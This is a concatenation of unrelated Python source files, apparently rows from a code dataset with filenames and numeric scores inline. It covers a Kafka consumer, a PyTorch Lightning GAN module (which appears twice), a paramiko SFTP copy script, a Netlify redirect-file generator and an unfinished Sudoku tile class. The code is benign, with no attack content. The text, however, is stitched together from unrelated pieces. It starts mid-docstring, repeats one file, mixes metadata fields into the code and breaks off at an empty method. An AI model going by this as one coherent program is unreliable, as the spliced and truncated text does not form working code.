"DailyTopicStrategy",
"PARAMS": {
"topic_format": [
"ztf_%s_programid1",
"ztf_%s_programid3"
],
"date_format": "%Y%m%d",
"change_hour": 23,
"retention_days": 8,
}
}
}
PARAMS: dict
Parameters passed to :class:`confluent_kafka.Consumer`
The required parameters are:
- *bootstrap.servers*: comma separated <host:port> :py:class:`str` to brokers.
- *group.id*: :py:class:`str` with consumer group name.
**Example:**
Configure a Kafka Consumer to a secure Kafka Cluster
.. code-block:: python
#settings.py
CONSUMER_CONFIG = { ...
"PARAMS": {
"bootstrap.servers": "kafka1:9093,kafka2:9093",
"group.id": "step_group",
'security.protocol': 'SSL',
'ssl.ca.location': '<ca-cert path>',
'ssl.keystore.location': '<keystore path>',
'ssl.keystore.password': '<<PASSWORD>>'
}
}
all supported `confluent_kafka` parameters can be found
`here <https://github.com/edenhill/librdkafka/blob/master/CONFIGURATION.md>`_
"""
def __init__(self, config):
super().__init__(config)
# Disable auto commit
self.config["PARAMS"]["enable.auto.commit"] = False
# Creating consumer
self.consumer = Consumer(self.config["PARAMS"])
self.max_retries = int(self.config.get("COMMIT_RETRY", 5))
self.logger.info(
f"Creating consumer for {self.config['PARAMS'].get('bootstrap.servers')}"
)
self.dynamic_topic = False
if self.config.get("TOPICS"):
self.logger.info(f'Subscribing to {self.config["TOPICS"]}')
self.consumer.subscribe(self.config["TOPICS"])
elif self.config.get("TOPIC_STRATEGY"):
self.dynamic_topic = True
module_name, class_name = self.config["TOPIC_STRATEGY"]["CLASS"].rsplit(
".", 1
)
TopicStrategy = getattr(importlib.import_module(module_name), class_name)
self.topic_strategy = TopicStrategy(
**self.config["TOPIC_STRATEGY"]["PARAMS"]
)
self.topics = self.topic_strategy.get_topics()
self.logger.info(f'Using {self.config["TOPIC_STRATEGY"]}')
self.logger.info(f"Subscribing to {self.topics}")
self.consumer.subscribe(self.topics)
else:
raise Exception("No topics o topic strategy set. ")
def __del__(self):
self.logger.info("Shutting down Consumer")
if hasattr(self, "consumer"):
self.consumer.close()
def _deserialize_message(self, message):
bytes_io = io.BytesIO(message.value())
reader = fastavro.reader(bytes_io)
data = reader.next()
return data
def _check_topics(self):
"""
Returns true if new topic
"""
topics = self.topic_strategy.get_topics()
if topics != self.topics:
return True
return False
def _subscribe_to_new_topics(self):
"""
Sets current topic to new topic
"""
self.topics = self.topic_strategy.get_topics()
self.consumer.unsubscribe()
self.logger.info(f"Suscribing to {self.topics}")
self.consumer.subscribe(self.topics)
def set_basic_config(self, num_messages, timeout):
if "consume.messages" in self.config:
num_messages = self.config["consume.messages"]
elif "NUM_MESSAGES" in self.config:
num_messages = self.config["NUM_MESSAGES"]
if "consume.timeout" in self.config:
timeout = self.config["consume.timeout"]
elif "TIMEOUT" in self.config:
timeout = self.config["TIMEOUT"]
return num_messages, timeout
def consume(self, num_messages=1, timeout=60):
"""
Consumes `num_messages` messages from the specified topic.
Will return a dictionary or a list, depending on the number of messages consumed.
If num_messages > 1 then it returns list.
If num_messages = 1 then it returns dict.
Parameters
--------------
num_messages: int
Number of messages to be consumed
timeout: int
Seconds to wait when consuming messages. Raises exception if doesn't get the messages after
specified time
"""
num_messages, timeout = self.set_basic_config(num_messages, timeout)
messages = []
while True:
if self.dynamic_topic:
if self._check_topics():
self._subscribe_to_new_topics()
messages = self.consumer.consume(num_messages=num_messages, timeout=timeout)
if len(messages) == 0:
continue
deserialized = []
for message in messages:
if message.error():
if message.error().name() == "_PARTITION_EOF":
self.logger.info("PARTITION_EOF: No more messages")
return
self.logger.exception(f"Error in kafka stream: {message.error()}")
continue
else:
message = self._deserialize_message(message)
deserialized.append(message)
self.messages = messages
messages = []
if len(deserialized) > 0:
if num_messages == 1:
yield deserialized[0]
else:
yield deserialized
def commit(self):
retries = 0
commited = False
while not commited:
try:
self.consumer.commit(asynchronous=False)
commited = True
except KafkaException as e:
retries += 1
# Rasing the same error
if retries == self.max_retries:
raise e | 0.84941 | 0.279712 |
import pytorch_lightning as pl
from nets.factory import factory as nets_fac
from optimization.loss_functions import factory as loss_fac
from optimization.optimizers import factory as opt_fac
import numpy as np
from datetime import datetime
import os
import torch
import torchvision.utils as vutils
from pytorch_lightning.metrics import PSNR
import matplotlib.pyplot as plt
import utils.utils as utils
import math
class GAN(pl.LightningModule):
    """GAN LightningModule for stochastic image restoration.

    Builds a generator/discriminator pair plus their losses from the config
    via the project factories. Training alternates generator/discriminator
    steps; validation renders preview collages; testing computes FID/PSNR
    traversals over noise stds and sample-averaging counts, optional
    collages, and denoiser-criteria histograms.

    NOTE(review): ``val_path``, ``test_path``, ``m_real``/``s_real`` start
    as None and appear to be assigned externally or in test hooks — confirm
    against the training script.
    """

    def __init__(self, config):
        super().__init__()
        self.config = config
        # Networks and losses come from factory registries keyed by 'type'.
        self.gen = nets_fac[config['gen_cfg']['type']](config['gen_cfg'])
        self.disc = nets_fac[config['disc_cfg']['type']](config['disc_cfg'])
        self.gen_loss = loss_fac[config['gen_cfg']['loss_cfg']['type']](config['gen_cfg']['loss_cfg'],
                                                                       self.gen, self.disc)
        self.disc_loss = loss_fac[config['disc_cfg']['loss_cfg']['type']](config['disc_cfg']['loss_cfg'],
                                                                         self.gen, self.disc)
        self.num_disc_steps = config['num_disc_steps']
        if 'test_cfg' in config:
            self.test_cfg = config['test_cfg']
            self.noise_std_traversal = config['test_cfg']['noise_std_traversal']
            self.num_avg_samples_traversal = config['test_cfg']['num_avg_samples_traversal']
            self.num_fid_evals = config['test_cfg']['num_fid_evals']
            self.divide_expanded_forward_pass = config['test_cfg']['divide_expanded_forward_pass']
        # Lazily-initialised state, populated by the hooks below (or
        # assigned externally, see class NOTE).
        self.collages = None
        self.ours_s_fids = None
        self.ours_a_fids = None
        self.psnr_for_ours_a_fid = None
        self.psnr_for_ours_s_fid = None
        self.collage_metric = None
        self.val_path = None
        self.m_real = None
        self.s_real = None
        self.test_path = None
        self.denoiser_criteria = None

    def on_load_checkpoint(self, checkpoint):
        # Drop checkpoint tensors whose shape no longer matches the current
        # model, so loading proceeds with freshly initialised weights there.
        sd = self.state_dict()
        for param in sd:
            if param in checkpoint['state_dict'] and sd[param].size() != checkpoint['state_dict'][param].size():
                del checkpoint['state_dict'][param]

    def configure_optimizers(self):
        # The discriminator gets `num_disc_steps` optimisation steps per
        # generator step (Lightning alternates by 'frequency').
        gen_opt = opt_fac[self.config['optim_cfg']['type']](self.gen.parameters(), self.config['optim_cfg'])
        disc_opt = opt_fac[self.config['optim_cfg']['type']](self.disc.parameters(), self.config['optim_cfg'])
        return {'optimizer': gen_opt, 'frequency': 1}, {'optimizer': disc_opt, 'frequency': self.num_disc_steps}

    def forward(self, y, **kwargs):
        """Generate restored samples for the degraded input batch ``y``."""
        gen_out = self.gen(y=y, encoder_assistance=True, **kwargs)
        return gen_out

    def batch_postprocess(self, batch):
        """Split a dataloader batch into (clean, degraded) tensors."""
        return batch['real'], batch['noisy']

    def training_step(self, batch, batch_idx, optimizer_idx):
        # optimizer_idx 0 -> generator update, otherwise discriminator.
        x, y = self.batch_postprocess(batch)
        if optimizer_idx == 0:
            loss, logs = self.gen_loss(real=x, gen_input=y, batch_idx=batch_idx)
            self.log_dict(logs, prog_bar=True, logger=True)
        else:
            loss, logs = self.disc_loss(real=x, gen_input=y)
            self.log_dict(logs, prog_bar=True, logger=True)
        return loss

    def validation_step(self, batch, batch_idx):
        if self.collage_metric is None:
            self.collage_metric = utils.CollageVal().to(self.device)
        x, y = self.batch_postprocess(batch)
        # Four samples per input to visualise generator diversity.
        y_expanded = utils.expand_4d_batch(y, 4)
        with torch.no_grad():
            out = self(y=y_expanded, noise_stds=1)
        # Only the first validation batch feeds the preview collage.
        if batch_idx == 0:
            self.collage_metric.update(x)
            self.collage_metric.update(out)

    def validation_epoch_end(self, outputs):
        out = self.collage_metric.compute()
        self.collage_metric.reset()
        fig = plt.figure(figsize=(15, 15))
        plt.axis("off")
        plt.title("Generated Images")
        plt.imshow(np.transpose(vutils.make_grid(out.clamp_(0, 1).detach().cpu(), padding=2,
                                                 normalize=False, range=(0, 1)), (1, 2, 0)))
        fig.savefig(os.path.join(self.val_path, str(self.current_epoch).zfill(5) + "_fake_collage_" +
                                 datetime.now().strftime("%d-%m-%Y_%I-%M-%S_%p") + ".png"), dpi=350)
        # Fix: release the figure — otherwise one figure leaks per epoch.
        plt.close(fig)

    def on_test_epoch_start(self):
        """Allocate test-time metrics/collages according to test_cfg flags."""
        if self.test_cfg['collages']:
            self.collages = torch.nn.ModuleDict(
                {str(i): utils.Collage(i, self.test_path, 8,
                                       ["real", "noisy"] +
                                       ['fake_z' + str(noise_std) for noise_std in self.noise_std_traversal] +
                                       ["mean", "std_dev_z1"]).to(self.device) for i in self.test_cfg['save_batch']})
        if self.test_cfg['fid_and_psnr']:
            # Real-data FID statistics (cached at training_data_stats_path).
            self.m_real, self.s_real, model = utils.init_fid(self.test_cfg['training_data_stats_path'],
                                                             self.train_dataloader(),
                                                             self.device,
                                                             verbose=False)
            self.ours_a_fids = torch.nn.ModuleList([utils.FID(1, self.m_real, self.s_real, model)
                                                    for _ in self.num_avg_samples_traversal]).to(self.device)
            self.psnr_for_ours_a_fid = torch.nn.ModuleList([PSNR(1)
                                                            for _ in self.num_avg_samples_traversal]).to(self.device)
            self.ours_s_fids = torch.nn.ModuleList([utils.FID(self.num_fid_evals, self.m_real, self.s_real, model)
                                                    for _ in self.noise_std_traversal]).to(self.device)
            self.psnr_for_ours_s_fid = torch.nn.ModuleList([PSNR(1)
                                                            for _ in self.noise_std_traversal]).to(self.device)
        if self.test_cfg['denoiser_criteria']:
            # 15x15 box filter over 3 channels for the local statistics.
            avg_kernel = 1/(3*15*15) * torch.ones(1, 3, 15, 15).to(self.device)
            self.denoiser_criteria = utils.DenoiserCriteria(avg_kernel).to(self.device)

    def forward_with_divisor(self, y, divisor, **kwargs):
        """Forward ``y`` in ``divisor`` sequential chunks to bound memory."""
        out = []
        for i in range(divisor):
            out.append(self(y[i * y.shape[0] // divisor: (i + 1) * y.shape[0] // divisor], **kwargs))
        return torch.cat(out, dim=0)

    def test_step(self, batch, batch_idx):
        x, y = self.batch_postprocess(batch)
        with torch.no_grad():
            save_collage = self.test_cfg['collages'] and batch_idx in self.test_cfg['save_batch']
            idx = None
            if self.test_cfg['fid_and_psnr'] or save_collage:
                if save_collage:
                    idx = str(batch_idx)
                    self.collages[idx].set_batch_size(x.shape[0])
                    self.collages[idx].update("real", x)
                    self.collages[idx].update("noisy", y)
                # Collages need at least 8 samples per input; FID needs
                # num_fid_evals.
                expansion = max(8, self.num_fid_evals) if save_collage else self.num_fid_evals
                y_expanded = utils.expand_4d_batch(y, expansion)
                x_expanded = utils.expand_4d_batch(x, expansion)
                # Reused for the mean/std panels when already computed below.
                out_reshaped_64_sigma_1 = None
                for i, noise_stds in enumerate(self.noise_std_traversal):
                    out = self.forward_with_divisor(y_expanded, self.divide_expanded_forward_pass,
                                                    noise_stds=noise_stds)
                    out_reshaped = utils.restore_expanded_4d_batch(out, expansion)
                    if self.test_cfg['fid_and_psnr']:
                        self.ours_s_fids[i].update(out_reshaped[:self.num_fid_evals])
                        self.psnr_for_ours_s_fid[i].update(x_expanded, out)
                    if save_collage:
                        self.collages[idx].update("fake_z" + str(noise_stds), out_reshaped[:8])
                        if expansion == 64 and noise_stds == 1:
                            out_reshaped_64_sigma_1 = out_reshaped
                if self.test_cfg['fid_and_psnr']:
                    # FID/PSNR of the N-sample posterior mean, for each N.
                    for i, ours_a_expansion in enumerate(self.num_avg_samples_traversal):
                        out = self.forward_with_divisor(utils.expand_4d_batch(y, ours_a_expansion),
                                                        self.divide_expanded_forward_pass, noise_stds=1)
                        out_reshaped_fid = utils.restore_expanded_4d_batch(out, ours_a_expansion)
                        out_fid_mean = out_reshaped_fid.mean(0)
                        self.ours_a_fids[i].update(out_fid_mean.unsqueeze(0))
                        self.psnr_for_ours_a_fid[i].update(x, out_fid_mean)
                        if save_collage and ours_a_expansion == 64:
                            out_reshaped_64_sigma_1 = out_reshaped_fid
                if save_collage:
                    if out_reshaped_64_sigma_1 is None:
                        out = self.forward_with_divisor(utils.expand_4d_batch(y, 64),
                                                        self.divide_expanded_forward_pass, noise_stds=1)
                        out_reshaped_64_sigma_1 = utils.restore_expanded_4d_batch(out, 64)
                    self.collages[idx].update("mean", out_reshaped_64_sigma_1.mean(0))
                    # Quartic root stretches the std-dev map for visibility.
                    self.collages[idx].update("std_dev_z1", out_reshaped_64_sigma_1.std(0) ** (1 / 4))
            if self.test_cfg['denoiser_criteria']:
                out = self.forward_with_divisor(y, 1, noise_stds=1)
                # (restoration error, removed noise, true noise)
                self.denoiser_criteria.update(out - x, y - out, y - x, self.device)

    def test_epoch_end(self, outputs):
        if self.test_cfg['fid_and_psnr']:
            for i, noise_stds in enumerate(self.noise_std_traversal):
                ours_s_fid_scores = self.ours_s_fids[i].compute()
                self.log("Sigma_z=" + str(noise_stds) + "_FID_mean", torch.mean(ours_s_fid_scores), prog_bar=True,
                         logger=True)
                self.log("Sigma_z=" + str(noise_stds) + "_FID_std", torch.std(ours_s_fid_scores), prog_bar=True,
                         logger=True)
                self.log("Sigma_z=" + str(noise_stds) + "_PSNR", self.psnr_for_ours_s_fid[i].compute(), prog_bar=True,
                         logger=True)
            for i, num_expansions in enumerate(self.num_avg_samples_traversal):
                self.log("N=" + str(num_expansions) + "_FID", self.ours_a_fids[i].compute(), prog_bar=True, logger=True)
                self.log("N=" + str(num_expansions) + "_PSNR", self.psnr_for_ours_a_fid[i].compute(), prog_bar=True,
                         logger=True)
        if self.test_cfg['collages']:
            for idx in self.collages:
                # Zero-pad filenames to the widest saved batch index.
                # NOTE(review): math.log10 is 0 for max==1 and raises for
                # max==0 — confirm save_batch never contains only 0/1.
                zfill = max(self.test_cfg['save_batch'])
                self.collages[idx].compute(math.ceil(math.log10(zfill)))
        if self.test_cfg['denoiser_criteria']:
            save_path = os.path.join(self.test_path, "histograms")
            utils.mkdir(save_path)
            hist_kwargs = dict(bins='auto', density=True)
            label = 'noise-std=1_'
            result = self.denoiser_criteria.compute(save_path, label=label, **hist_kwargs)
            self.log(label + "local remainder noise worst p-value", result['remainder_noise_worst_p'],
                     prog_bar=True, logger=True)
            self.log(label + "local remainder noise random p-value", result['remainder_noise_random_p'],
                     prog_bar=True, logger=True)
            self.log(label + "remainder noise overall p-value", result['remainder_noise_overall_p'],
                     prog_bar=True, logger=True)
from nets.factory import factory as nets_fac
from optimization.loss_functions import factory as loss_fac
from optimization.optimizers import factory as opt_fac
import numpy as np
from datetime import datetime
import os
import torch
import torchvision.utils as vutils
from pytorch_lightning.metrics import PSNR
import matplotlib.pyplot as plt
import utils.utils as utils
import math
class GAN(pl.LightningModule):
def __init__(self, config):
super().__init__()
self.config = config
self.gen = nets_fac[config['gen_cfg']['type']](config['gen_cfg'])
self.disc = nets_fac[config['disc_cfg']['type']](config['disc_cfg'])
self.gen_loss = loss_fac[config['gen_cfg']['loss_cfg']['type']](config['gen_cfg']['loss_cfg'],
self.gen, self.disc)
self.disc_loss = loss_fac[config['disc_cfg']['loss_cfg']['type']](config['disc_cfg']['loss_cfg'],
self.gen, self.disc)
self.num_disc_steps = config['num_disc_steps']
if 'test_cfg' in config:
self.test_cfg = config['test_cfg']
self.noise_std_traversal = config['test_cfg']['noise_std_traversal']
self.num_avg_samples_traversal = config['test_cfg']['num_avg_samples_traversal']
self.num_fid_evals = config['test_cfg']['num_fid_evals']
self.divide_expanded_forward_pass = config['test_cfg']['divide_expanded_forward_pass']
self.collages = None
self.ours_s_fids = None
self.ours_a_fids = None
self.psnr_for_ours_a_fid = None
self.psnr_for_ours_s_fid = None
self.collage_metric = None
self.val_path = None
self.m_real = None
self.s_real = None
self.test_path = None
self.denoiser_criteria = None
def on_load_checkpoint(self, checkpoint):
sd = self.state_dict()
for param in sd:
if param in checkpoint['state_dict'] and sd[param].size() != checkpoint['state_dict'][param].size():
del checkpoint['state_dict'][param]
def configure_optimizers(self):
gen_opt = opt_fac[self.config['optim_cfg']['type']](self.gen.parameters(), self.config['optim_cfg'])
disc_opt = opt_fac[self.config['optim_cfg']['type']](self.disc.parameters(), self.config['optim_cfg'])
return {'optimizer': gen_opt, 'frequency': 1}, {'optimizer': disc_opt, 'frequency': self.num_disc_steps}
def forward(self, y, **kwargs):
gen_out = self.gen(y=y, encoder_assistance=True, **kwargs)
return gen_out
def batch_postprocess(self, batch):
return batch['real'], batch['noisy']
def training_step(self, batch, batch_idx, optimizer_idx):
x, y = self.batch_postprocess(batch)
if optimizer_idx == 0:
loss, logs = self.gen_loss(real=x, gen_input=y, batch_idx=batch_idx)
self.log_dict(logs, prog_bar=True, logger=True)
else:
loss, logs = self.disc_loss(real=x, gen_input=y)
self.log_dict(logs, prog_bar=True, logger=True)
return loss
def validation_step(self, batch, batch_idx):
if self.collage_metric is None:
self.collage_metric = utils.CollageVal().to(self.device)
x, y = self.batch_postprocess(batch)
y_expanded = utils.expand_4d_batch(y, 4)
with torch.no_grad():
out = self(y=y_expanded, noise_stds=1)
if batch_idx == 0:
self.collage_metric.update(x)
self.collage_metric.update(out)
def validation_epoch_end(self, outputs):
out = self.collage_metric.compute()
self.collage_metric.reset()
fig = plt.figure(figsize=(15, 15))
plt.axis("off")
plt.title("Generated Images")
plt.imshow(np.transpose(vutils.make_grid(out.clamp_(0, 1).detach().cpu(), padding=2,
normalize=False, range=(0, 1)), (1, 2, 0)))
fig.savefig(os.path.join(self.val_path, str(self.current_epoch).zfill(5) + "_fake_collage_" +
datetime.now().strftime("%d-%m-%Y_%I-%M-%S_%p") + ".png"), dpi=350)
def on_test_epoch_start(self):
if self.test_cfg['collages']:
self.collages = torch.nn.ModuleDict(
{str(i): utils.Collage(i, self.test_path, 8,
["real", "noisy"] +
['fake_z' + str(noise_std) for noise_std in self.noise_std_traversal] +
["mean", "std_dev_z1"]).to(self.device) for i in self.test_cfg['save_batch']})
if self.test_cfg['fid_and_psnr']:
self.m_real, self.s_real, model = utils.init_fid(self.test_cfg['training_data_stats_path'],
self.train_dataloader(),
self.device,
verbose=False)
self.ours_a_fids = torch.nn.ModuleList([utils.FID(1, self.m_real, self.s_real, model)
for _ in self.num_avg_samples_traversal]).to(self.device)
self.psnr_for_ours_a_fid = torch.nn.ModuleList([PSNR(1)
for _ in self.num_avg_samples_traversal]).to(self.device)
self.ours_s_fids = torch.nn.ModuleList([utils.FID(self.num_fid_evals, self.m_real, self.s_real, model)
for _ in self.noise_std_traversal]).to(self.device)
self.psnr_for_ours_s_fid = torch.nn.ModuleList([PSNR(1)
for _ in self.noise_std_traversal]).to(self.device)
if self.test_cfg['denoiser_criteria']:
avg_kernel = 1/(3*15*15) * torch.ones(1, 3, 15, 15).to(self.device)
self.denoiser_criteria = utils.DenoiserCriteria(avg_kernel).to(self.device)
def forward_with_divisor(self, y, divisor, **kwargs):
out = []
for i in range(divisor):
out.append(self(y[i * y.shape[0] // divisor: (i + 1) * y.shape[0] // divisor], **kwargs))
return torch.cat(out, dim=0)
def test_step(self, batch, batch_idx):
x, y = self.batch_postprocess(batch)
with torch.no_grad():
save_collage = self.test_cfg['collages'] and batch_idx in self.test_cfg['save_batch']
idx = None
if self.test_cfg['fid_and_psnr'] or save_collage:
if save_collage:
idx = str(batch_idx)
self.collages[idx].set_batch_size(x.shape[0])
self.collages[idx].update("real", x)
self.collages[idx].update("noisy", y)
expansion = max(8, self.num_fid_evals) if save_collage else self.num_fid_evals
y_expanded = utils.expand_4d_batch(y, expansion)
x_expanded = utils.expand_4d_batch(x, expansion)
out_reshaped_64_sigma_1 = None
for i, noise_stds in enumerate(self.noise_std_traversal):
out = self.forward_with_divisor(y_expanded, self.divide_expanded_forward_pass,
noise_stds=noise_stds)
out_reshaped = utils.restore_expanded_4d_batch(out, expansion)
if self.test_cfg['fid_and_psnr']:
self.ours_s_fids[i].update(out_reshaped[:self.num_fid_evals])
self.psnr_for_ours_s_fid[i].update(x_expanded, out)
if save_collage:
self.collages[idx].update("fake_z" + str(noise_stds), out_reshaped[:8])
if expansion == 64 and noise_stds == 1:
out_reshaped_64_sigma_1 = out_reshaped
if self.test_cfg['fid_and_psnr']:
for i, ours_a_expansion in enumerate(self.num_avg_samples_traversal):
out = self.forward_with_divisor(utils.expand_4d_batch(y, ours_a_expansion),
self.divide_expanded_forward_pass, noise_stds=1)
out_reshaped_fid = utils.restore_expanded_4d_batch(out, ours_a_expansion)
out_fid_mean = out_reshaped_fid.mean(0)
self.ours_a_fids[i].update(out_fid_mean.unsqueeze(0))
self.psnr_for_ours_a_fid[i].update(x, out_fid_mean)
if save_collage and ours_a_expansion == 64:
out_reshaped_64_sigma_1 = out_reshaped_fid
if save_collage:
if out_reshaped_64_sigma_1 is None:
out = self.forward_with_divisor(utils.expand_4d_batch(y, 64),
self.divide_expanded_forward_pass, noise_stds=1)
out_reshaped_64_sigma_1 = utils.restore_expanded_4d_batch(out, 64)
self.collages[idx].update("mean", out_reshaped_64_sigma_1.mean(0))
self.collages[idx].update("std_dev_z1", out_reshaped_64_sigma_1.std(0) ** (1 / 4))
if self.test_cfg['denoiser_criteria']:
out = self.forward_with_divisor(y, 1, noise_stds=1)
self.denoiser_criteria.update(out - x, y - out, y - x, self.device)
def test_epoch_end(self, outputs):
if self.test_cfg['fid_and_psnr']:
for i, noise_stds in enumerate(self.noise_std_traversal):
ours_s_fid_scores = self.ours_s_fids[i].compute()
self.log("Sigma_z=" + str(noise_stds) + "_FID_mean", torch.mean(ours_s_fid_scores), prog_bar=True,
logger=True)
self.log("Sigma_z=" + str(noise_stds) + "_FID_std", torch.std(ours_s_fid_scores), prog_bar=True,
logger=True)
self.log("Sigma_z=" + str(noise_stds) + "_PSNR", self.psnr_for_ours_s_fid[i].compute(), prog_bar=True,
logger=True)
for i, num_expansions in enumerate(self.num_avg_samples_traversal):
self.log("N=" + str(num_expansions) + "_FID", self.ours_a_fids[i].compute(), prog_bar=True, logger=True)
self.log("N=" + str(num_expansions) + "_PSNR", self.psnr_for_ours_a_fid[i].compute(), prog_bar=True,
logger=True)
if self.test_cfg['collages']:
for idx in self.collages:
zfill = max(self.test_cfg['save_batch'])
self.collages[idx].compute(math.ceil(math.log10(zfill)))
if self.test_cfg['denoiser_criteria']:
save_path = os.path.join(self.test_path, "histograms")
utils.mkdir(save_path)
hist_kwargs = dict(bins='auto', density=True)
label = 'noise-std=1_'
result = self.denoiser_criteria.compute(save_path, label=label, **hist_kwargs)
self.log(label + "local remainder noise worst p-value", result['remainder_noise_worst_p'],
prog_bar=True, logger=True)
self.log(label + "local remainder noise random p-value", result['remainder_noise_random_p'],
prog_bar=True, logger=True)
self.log(label + "remainder noise overall p-value", result['remainder_noise_overall_p'],
prog_bar=True, logger=True) | 0.83622 | 0.316211 |
import logging
import paramiko
import hashlib
import datetime
import configparser
import sys
import os
conf_file = '/mnt/conf/sftp.conf'
#conf_file = '/home/orenault/Developments/airflow-demo/docker-files/connect-sftp/sftp-local.conf'
def read_conf(confFile):
sftpConf = {}
try:
with open(confFile, 'r') as conf:
config = configparser.ConfigParser()
config.readfp(conf)
for section_name in config.sections():
for name, value in config.items(section_name):
sftpConf[name] = value
print
except IOError:
print ("ERROR: Can't read conf file!")
sys.exit(0)
return sftpConf
def sha256_checksum(filename, block_size=65536):
sha256 = hashlib.sha256()
with open(filename, 'rb') as f:
for block in iter(lambda: f.read(block_size), b''):
sha256.update(block)
return sha256.hexdigest()
def main():
conf = read_conf(conf_file)
# initialize paramiko client
ssh = paramiko.SSHClient()
ssh.load_host_keys(conf['known_hosts_file'])
with open(conf['dest_path'] + '/sha256', "a+") as f:
# initiate connection
try:
ssh.connect(conf['hostname'], port=conf['port'], username=conf['username'], key_filename=conf['ssh_key'], compress=True, look_for_keys=False)
sftp = ssh.open_sftp()
sftp.chdir(conf['src_path'])
for filename in sftp.listdir():
try:
local_file_size = os.stat(conf['dest_path'] + "/" + filename).st_size
if local_file_size != sftp.stat(filename).st_size:
raise IOError
except IOError:
sftp.get(filename, conf['dest_path'] + "/" + filename)
f.write(filename + " " + sha256_checksum(conf['dest_path'] + '/' + filename) + " " + str(datetime.datetime.now()).split('.')[0] + "\n")
print(filename)
ssh.close()
print('DONE')
except paramiko.SSHException:
print('Connection Error')
if __name__ == "__main__":
main() | docker-files/connect-sftp/copy-files.py |
import logging
import paramiko
import hashlib
import datetime
import configparser
import sys
import os
conf_file = '/mnt/conf/sftp.conf'
#conf_file = '/home/orenault/Developments/airflow-demo/docker-files/connect-sftp/sftp-local.conf'
def read_conf(confFile):
sftpConf = {}
try:
with open(confFile, 'r') as conf:
config = configparser.ConfigParser()
config.readfp(conf)
for section_name in config.sections():
for name, value in config.items(section_name):
sftpConf[name] = value
print
except IOError:
print ("ERROR: Can't read conf file!")
sys.exit(0)
return sftpConf
def sha256_checksum(filename, block_size=65536):
sha256 = hashlib.sha256()
with open(filename, 'rb') as f:
for block in iter(lambda: f.read(block_size), b''):
sha256.update(block)
return sha256.hexdigest()
def main():
conf = read_conf(conf_file)
# initialize paramiko client
ssh = paramiko.SSHClient()
ssh.load_host_keys(conf['known_hosts_file'])
with open(conf['dest_path'] + '/sha256', "a+") as f:
# initiate connection
try:
ssh.connect(conf['hostname'], port=conf['port'], username=conf['username'], key_filename=conf['ssh_key'], compress=True, look_for_keys=False)
sftp = ssh.open_sftp()
sftp.chdir(conf['src_path'])
for filename in sftp.listdir():
try:
local_file_size = os.stat(conf['dest_path'] + "/" + filename).st_size
if local_file_size != sftp.stat(filename).st_size:
raise IOError
except IOError:
sftp.get(filename, conf['dest_path'] + "/" + filename)
f.write(filename + " " + sha256_checksum(conf['dest_path'] + '/' + filename) + " " + str(datetime.datetime.now()).split('.')[0] + "\n")
print(filename)
ssh.close()
print('DONE')
except paramiko.SSHException:
print('Connection Error')
if __name__ == "__main__":
main() | 0.164886 | 0.051272 |
# +++++++++++++++++++++++++++++++++++++++++++++++++++++
# IMPORTS
# +++++++++++++++++++++++++++++++++++++++++++++++++++++
import os
import csv
import urllib.request
# +++++++++++++++++++++++++++++++++++++++++++++++++++++
# FUNCTIONS
# +++++++++++++++++++++++++++++++++++++++++++++++++++++
def write_index_html(noindex=True, nofollow=True):
"""
Write Index.html file to be dispalyed as main entry point of redirect subdomain.
"""
index = "noindex" if noindex else "index"
follow = "nofollow" if nofollow else "follow"
html_str = f"""
<html>
<head>
<meta name="robots" content="{index},{follow}">
</head>
<body>
Welcome to Google Sheet URL Shortener
</body>
</html>
"""
html_file = open("index.html", "w")
html_file.write(html_str)
html_file.close()
def gsheet_to_netlify_toml(google_sheet_url = None):
"""
Main function to generate netlify.toml file.
This function download Google Sheets as CSV file and fetch the data.
"""
if google_sheet_url:
response = urllib.request.urlopen(google_sheet_url)
lines = [l.decode("utf-8") for l in response.readlines()]
gsheet_data = csv.reader(lines)
rules = []
for data in gsheet_data:
if "https://" in data[0] and len(data) == 3:
rules.append(
[
f"[[redirects]]\n",
f'from = "{data[1].strip()}"\n',
f'to = "{data[0].strip()}"\n',
f'code = {data[2].strip()}\n',
"\n",
]
)
path = "netlify.toml"
with open(path, "w", encoding="utf-8") as f:
f.writelines(["".join(rule) for rule in rules])
if __name__ == "__main__":
google_sheet_url = None # replace if you do not want to specify it via netlify environment variables
if not google_sheet_url:
google_sheet_url = os.environ.get('gsheet_url')
write_index_html(noindex=False, nofollow=False)
gsheet_to_netlify_toml(google_sheet_url) | shortener.py | # +++++++++++++++++++++++++++++++++++++++++++++++++++++
# IMPORTS
# +++++++++++++++++++++++++++++++++++++++++++++++++++++
import os
import csv
import urllib.request
# +++++++++++++++++++++++++++++++++++++++++++++++++++++
# FUNCTIONS
# +++++++++++++++++++++++++++++++++++++++++++++++++++++
def write_index_html(noindex=True, nofollow=True):
"""
Write Index.html file to be dispalyed as main entry point of redirect subdomain.
"""
index = "noindex" if noindex else "index"
follow = "nofollow" if nofollow else "follow"
html_str = f"""
<html>
<head>
<meta name="robots" content="{index},{follow}">
</head>
<body>
Welcome to Google Sheet URL Shortener
</body>
</html>
"""
html_file = open("index.html", "w")
html_file.write(html_str)
html_file.close()
def gsheet_to_netlify_toml(google_sheet_url = None):
"""
Main function to generate netlify.toml file.
This function download Google Sheets as CSV file and fetch the data.
"""
if google_sheet_url:
response = urllib.request.urlopen(google_sheet_url)
lines = [l.decode("utf-8") for l in response.readlines()]
gsheet_data = csv.reader(lines)
rules = []
for data in gsheet_data:
if "https://" in data[0] and len(data) == 3:
rules.append(
[
f"[[redirects]]\n",
f'from = "{data[1].strip()}"\n',
f'to = "{data[0].strip()}"\n',
f'code = {data[2].strip()}\n',
"\n",
]
)
path = "netlify.toml"
with open(path, "w", encoding="utf-8") as f:
f.writelines(["".join(rule) for rule in rules])
if __name__ == "__main__":
google_sheet_url = None # replace if you do not want to specify it via netlify environment variables
if not google_sheet_url:
google_sheet_url = os.environ.get('gsheet_url')
write_index_html(noindex=False, nofollow=False)
gsheet_to_netlify_toml(google_sheet_url) | 0.227727 | 0.118385 |
import pygame
from sudoku import constants as cst
from sudoku.Generators import sudGen
from sudoku.solvers import SudokuSolve
class Tile:
def __init__(self, num=0, isOrig=False):
self.img = "pics/num" + str(num) + ".png"
self.x = 0
self.y = 0
self.val = num
self.isOrig = isOrig
self.Image = pygame.image.load(self.img)
def updatePos(self, row, col):
self.y = cst.GRID_LEFT_OFFSET + row * (cst.TILE_WIDTH + cst.TILE_X_SPACER)
self.x = cst.GRID_TOP_OFFSET + col * (cst.TILE_HEIGHT + cst.TILE_Y_SPACER)
def switch(self, newNum: int):
self.img = "pics/num" + str(newNum) + ".png"
self.val = newNum
self.updateImage()
def updateImage(self):
self.Image = pygame.image.load(self.img)
def display(self):
